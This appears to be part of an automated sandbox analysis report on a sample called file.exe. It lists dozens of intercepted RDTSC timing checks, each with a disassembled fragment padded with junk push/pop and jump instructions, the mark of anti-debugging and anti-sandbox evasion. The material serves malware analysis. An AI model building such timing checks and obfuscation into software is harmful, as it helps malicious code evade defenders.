                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4EEE1 second address: B4EEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4A81237CCCh 0x0000000a jnc 00007F4A81237CCCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4EEF9 second address: B4EF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jbe 00007F4A80B11C36h 0x0000000e jmp 00007F4A80B11C3Ah 0x00000013 jne 00007F4A80B11C36h 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4EF1B second address: B4EF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 je 00007F4A81237CC6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4EF2A second address: B4EF30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4EF30 second address: B4EF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E4B6 second address: B4E4CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C45h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E4CF second address: B4E4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jo 00007F4A81237CC6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E4E1 second address: B4E519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C3Bh 0x00000007 jnl 00007F4A80B11C36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F4A80B11C45h 0x00000014 push edi 0x00000015 jmp 00007F4A80B11C3Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E843 second address: B4E848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E848 second address: B4E84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E84E second address: B4E852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E852 second address: B4E861 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E99E second address: B4E9A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E9A2 second address: B4E9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E9A8 second address: B4E9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F4A81237CCBh 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 jnp 00007F4A81237CC6h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F4A81237CC6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E9CF second address: B4E9E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4ED10 second address: B4ED48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD1h 0x00000007 jnc 00007F4A81237CCCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jc 00007F4A81237CD2h 0x00000016 jnl 00007F4A81237CC6h 0x0000001c jl 00007F4A81237CC6h 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4ED48 second address: B4ED73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F4A80B11C36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4A80B11C42h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4A80B11C3Bh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54667 second address: B5466D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5466D second address: B54675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53422 second address: B5343F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B535B8 second address: B535CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A80B11C40h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B535CC second address: B535D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B539F8 second address: B539FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5314B second address: B53151 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53151 second address: B53156 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53D8D second address: B53D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4A81237CC6h 0x0000000a jp 00007F4A81237CC6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B543F4 second address: B543F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B8CA second address: B5B8D9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F4A81237CC6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B8D9 second address: B5B8DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C01E second address: B04AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F4A81237CC8h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov edx, dword ptr [ebp+122D2DD8h] 0x00000027 call dword ptr [ebp+122D1851h] 0x0000002d push ebx 0x0000002e pushad 0x0000002f push esi 0x00000030 pop esi 0x00000031 jmp 00007F4A81237CCCh 0x00000036 popad 0x00000037 pop ebx 0x00000038 push edi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C116 second address: B1C11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C11A second address: B1C120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C25C second address: B1C261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C261 second address: B1C266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C5AE second address: B1C5B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C6FE second address: B1C71D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4A81237CD7h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C71D second address: B1C721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C721 second address: B1C73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4A81237CCCh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C73B second address: B1C73F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C9B2 second address: B1C9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C9B6 second address: B1C9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1CB57 second address: B1CB64 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1CB64 second address: B1CBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F4A80B11C38h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 xor ecx, dword ptr [ebp+122D2D34h] 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F4A80B11C38h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 adc cl, FFFFFFCAh 0x00000048 push eax 0x00000049 je 00007F4A80B11C42h 0x0000004f jg 00007F4A80B11C3Ch 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D314 second address: B1D31E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4A81237CCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D31E second address: B05640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 jmp 00007F4A80B11C46h 0x0000000d pop ebx 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F4A80B11C38h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 call dword ptr [ebp+122D1BCEh] 0x0000002f pushad 0x00000030 pushad 0x00000031 push esi 0x00000032 pop esi 0x00000033 jnl 00007F4A80B11C36h 0x00000039 push eax 0x0000003a pop eax 0x0000003b popad 0x0000003c jmp 00007F4A80B11C49h 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F4A80B11C47h 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05640 second address: B05644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BD15 second address: B5BD6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C48h 0x00000007 jo 00007F4A80B11C51h 0x0000000d jmp 00007F4A80B11C49h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4A80B11C40h 0x0000001e jp 00007F4A80B11C36h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BEE6 second address: B5BEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C455 second address: B5C459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C459 second address: B5C476 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CCAh 0x00000007 jmp 00007F4A81237CCFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C476 second address: B5C494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C46h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C494 second address: B5C498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C498 second address: B5C49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C49C second address: B5C4C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A81237CCAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4A81237CCEh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C4C5 second address: B5C4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6271C second address: B62722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61456 second address: B61460 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4A80B11C3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61460 second address: B6147F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4A81237CCDh 0x0000000f jl 00007F4A81237CC8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6147F second address: B6148A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F4A80B11C36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61734 second address: B6176C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4A81237CD4h 0x0000000b popad 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F4A81237CCFh 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F4A81237CC6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61B9D second address: B61BBF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4A80B11C45h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F4A80B11C58h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61BBF second address: B61BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A81237CCCh 0x00000009 js 00007F4A81237CC6h 0x0000000f popad 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61D39 second address: B61D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4A80B11C36h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BB9E second address: B6BBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4A81237CC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BCD4 second address: B6BCE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A80B11C3Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BE88 second address: B6BE9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F4A81237CCEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BE9C second address: B6BEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BEA8 second address: B6BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BEAE second address: B6BEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C02F second address: B6C050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD7h 0x00000007 jnp 00007F4A81237CDFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FED4 second address: B6FEF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FEF2 second address: B6FEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FEF9 second address: B6FF0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4A80B11C36h 0x00000009 jg 00007F4A80B11C36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FF0A second address: B6FF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4A81237CCDh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F61F second address: B6F625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F625 second address: B6F632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F4A81237CC6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F632 second address: B6F646 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4A80B11C3Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F905 second address: B6F909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FBC2 second address: B6FBF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4A80B11C49h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4A80B11C45h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FBF8 second address: B6FBFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1CD14 second address: B1CD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F4A80B11C38h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 mov dword ptr [ebp+124688BEh], ebx 0x00000018 popad 0x00000019 mov dword ptr [ebp+122D1BD3h], ebx 0x0000001f mov ebx, dword ptr [ebp+1247DD1Ah] 0x00000025 add eax, ebx 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F4A80B11C38h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 call 00007F4A80B11C3Dh 0x00000046 mov edx, eax 0x00000048 pop edx 0x00000049 xor edx, 3DFB6001h 0x0000004f push eax 0x00000050 pushad 0x00000051 jc 00007F4A80B11C3Ch 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1CD7C second address: B1CDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F4A81237CD3h 0x0000000a jo 00007F4A81237CC6h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 pop edi 0x00000018 pop edx 0x00000019 push 00000004h 0x0000001b sub ecx, dword ptr [ebp+122D2C1Ch] 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jo 00007F4A81237CC8h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B758C2 second address: B758C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A5B9 second address: B7A5ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F4A81237CDBh 0x0000000f jmp 00007F4A81237CCFh 0x00000014 jbe 00007F4A81237CC6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79BD2 second address: B79BF6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4A80B11C3Ch 0x00000008 jno 00007F4A80B11C36h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4A80B11C44h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79BF6 second address: B79BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A159 second address: B7A186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C42h 0x00000007 jmp 00007F4A80B11C41h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A186 second address: B7A18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
